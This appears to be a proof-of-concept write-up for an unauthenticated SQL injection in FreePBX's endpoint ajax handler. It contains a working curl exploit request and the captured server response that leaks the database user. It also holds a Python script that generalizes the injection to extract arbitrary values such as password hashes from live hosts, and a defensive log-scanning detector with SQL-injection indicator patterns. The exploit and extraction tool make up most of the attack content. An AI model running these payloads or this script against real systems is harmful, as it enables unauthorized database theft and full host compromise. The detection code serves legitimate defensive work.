FreePBX versions 15, 16, and 17 contain a Remote Code Execution (RCE) vulnerability caused by insufficient sanitization of user-supplied data in the endpoint module's ajax handler (/admin/ajax.php with module=FreePBX\modules\endpoint\ajax). The brand parameter is placed into a SQL query without sanitization, so an unauthenticated attacker can inject SQL, read and manipulate the database, and from there achieve remote code execution. No credentials or existing session are required.
Note: the target has been redacted. Replace [REDACTED_TARGET] with the real host when performing authorized testing.
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}
Why this proves it: the response body contains ~USER:freepbxuser@localhost~. That string is the result of the injected SELECT USER() subquery, echoed back inside MySQL's XPATH syntax error because EXTRACTVALUE() was handed an XPath expression that begins with an invalid character (~). The HTTP 500 is expected: error-based injection relies on the query failing. The request carried no session cookie and the server issued a fresh PHPSESSID in its reply, so the injected SQL ran before any authentication check. This single request demonstrates SQL injection and data disclosure; the database writes needed to turn it into code execution are not shown here.
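The following script is an added example, not code from the original PoC or from the FreePBX project. It generalizes the curl request above: it builds the same EXTRACTVALUE() payload for any SQL expression, parses the leaked value out of FreePBX's JSON error body, and walks results longer than the 32-character window MySQL allows in an XPATH syntax error by slicing them with SUBSTRING(). The function and constant names (brand_payload, leak_full, simulated_fetch, FAKE_SECRET) are this example's own; PAGE_RESPONSE is the response body captured above, embedded so the parser can be exercised offline, and simulated_fetch is a constructed stand-in for the server. Only http_fetch() touches the network, and it percent-encodes the quotes and parentheses that the curl command sends raw, which the server decodes identically.

```python
"""Added example (not from the original PoC): error-based extraction helper for
the EXTRACTVALUE() injection in the FreePBX endpoint ajax handler."""
import json
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request

AJAX_PATH = "/admin/ajax.php"
# urlencode() turns the backslashes into %5C, as in the PoC request.
MODULE = "FreePBX\\modules\\endpoint\\ajax"
# MySQL echoes at most 32 characters of the bad XPath string in its error,
# so '~label:' + value + '~' has to fit inside that window.
XPATH_ERR_LIMIT = 32
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^:~]*):(.*?)~'")


def chunk_width(label):
    """Characters of the leaked value that fit next to '~label:' and the closing '~'."""
    return XPATH_ERR_LIMIT - len(label) - 3


def brand_payload(expr, label="X"):
    """Value for the injectable `brand` parameter: close the string literal, AND in
    EXTRACTVALUE() with an invalid XPath so MySQL echoes `expr`, comment out the rest."""
    return f"x' AND EXTRACTVALUE(1,CONCAT('~{label}:',({expr}),'~')) -- "


def build_url(host, expr, label="X"):
    """Same query string as the PoC, with quotes and parentheses percent-encoded."""
    params = {"module": MODULE, "command": "model", "template": "x",
              "model": "model", "brand": brand_payload(expr, label)}
    return f"https://{host}{AJAX_PATH}?" + urllib.parse.urlencode(params)


def extract_leak(body, label=None):
    """Pull the leaked value out of the JSON error body; None if it is not there."""
    try:
        msg = json.loads(body)["error"]["message"]
    except (ValueError, KeyError, TypeError):
        return None
    m = XPATH_ERR.search(msg)
    if not m or (label is not None and m.group(1) != label):
        return None
    return m.group(2)


def leak_full(fetch, expr, label="X"):
    """Read a value longer than the error window one SUBSTRING() slice at a time.
    `fetch(sql_expr)` must return the HTTP response body for that expression."""
    width = chunk_width(label)
    out, offset = "", 1
    while True:
        piece = extract_leak(fetch(f"SUBSTRING(({expr}),{offset},{width})"), label)
        if not piece:
            return out
        out += piece
        if len(piece) < width:   # short slice means we reached the end
            return out
        offset += width


def http_fetch(host, label="X", verify_tls=False):
    """Real transport for leak_full(); not exercised offline.
    verify_tls=False mirrors curl -k in the PoC."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE

    def fetch(expr):
        try:
            with urllib.request.urlopen(build_url(host, expr, label), context=ctx, timeout=15) as r:
                return r.read().decode()
        except urllib.error.HTTPError as e:   # the leak arrives in a 500 response
            return e.read().decode()
    return fetch


# Constructed stand-in for the server so leak_full() can run offline: it models
# MySQL SUBSTRING() over a made-up 60-character value and wraps the slice in the
# same error text FreePBX returned above.
FAKE_SECRET = "a" * 30 + "b" * 30


def simulated_fetch(expr):
    m = re.fullmatch(r"SUBSTRING\(\((.*)\),(\d+),(\d+)\)", expr)
    off, width = int(m.group(2)), int(m.group(3))
    piece = FAKE_SECRET[off - 1:off - 1 + width]
    msg = f"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~X:{piece}~'::"
    return json.dumps({"error": {"type": "Exception", "message": msg, "line": 207}})


# The response body captured on the page above, embedded for an offline check.
PAGE_RESPONSE = ('{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: '
                 "1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::\",\"file\":"
                 '"\\/var\\/www\\/html\\/admin\\/libraries\\/utility.functions.php","line":207}}')

if __name__ == "__main__":
    print(build_url("[REDACTED_TARGET]", "SELECT USER()", "USER"))
    print(extract_leak(PAGE_RESPONSE, "USER"))   # freepbxuser@localhost
    print(leak_full(simulated_fetch, "SELECT secret") == FAKE_SECRET)   # True
```

Against a live target, leak_full(http_fetch(host), "SELECT USER()") reproduces the PoC; swap in any other scalar expression (a password hash, a table name from information_schema) and the slicing handles values longer than 28 characters, which the single curl request cannot.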

Impact: unauthenticated remote database manipulation leading to arbitrary code execution on the PBX host, so full system compromise is possible. Because the attack is a single GET request, the injected SQL also appears verbatim in the web server's access log.
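For the defensive side, the following detection is an added example, not part of the original PoC or of FreePBX. It parses Apache combined-format access-log lines, keeps only requests to /admin/ajax.php whose module parameter resolves to the endpoint ajax handler, URL-decodes the remaining parameters and flags any that carry SQL-injection indicators. The three log lines are constructed for the demo (client IPs are from documentation ranges); the first reuses the exact request path from the PoC above, and the indicator regex is deliberately crude and would need tuning before production use.

```python
"""Added example (not from the original PoC): flag endpoint-module ajax requests
carrying SQL-injection indicators in Apache combined-format access logs."""
import re
import urllib.parse

# Apache combined log format: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')
# Crude injection indicators, applied after URL-decoding each parameter value.
SQLI_HINT = re.compile(r"'|\bextractvalue\b|\bupdatexml\b|\bunion\b|\bselect\b", re.I)

# Constructed log lines: the PoC request as it would land in the access log,
# a benign-looking request to the same handler, and unrelated traffic.
SAMPLE_LOG = [
    '''203.0.113.7 - - [12/Sep/2025:08:35:29 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+ HTTP/1.1" 500 312 "-" "curl/8.0.1"''',
    '203.0.113.8 - - [12/Sep/2025:08:36:02 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=t1&model=m1&brand=b1 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [12/Sep/2025:08:36:10 +0000] "GET /admin/config.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def flag_request(line):
    """Return a finding dict for a suspicious endpoint-module ajax request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urllib.parse.urlsplit(m.group("target"))
    if url.path != "/admin/ajax.php":
        return None
    qs = urllib.parse.parse_qs(url.query, keep_blank_values=True)
    module = qs.get("module", [""])[0]          # %5C decodes to a backslash here
    if not module.lower().endswith("endpoint\\ajax"):
        return None
    tainted = [k for k, vals in qs.items()
               if k != "module" and any(SQLI_HINT.search(v) for v in vals)]
    if not tainted:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "status": int(m.group("status")), "params": tainted}


def scan(lines):
    """Findings for every suspicious line, in log order."""
    return [f for f in map(flag_request, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 500 status on such a request is a strong signal on its own (error-based injection needs the query to fail), but the indicator check is what separates the PoC line from ordinary endpoint-module traffic that happens to error out.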
This repository and PoC are provided only for educational and authorized security research. Do not test or exploit systems without explicit permission. The author is not responsible for misuse or damages resulting from this PoC.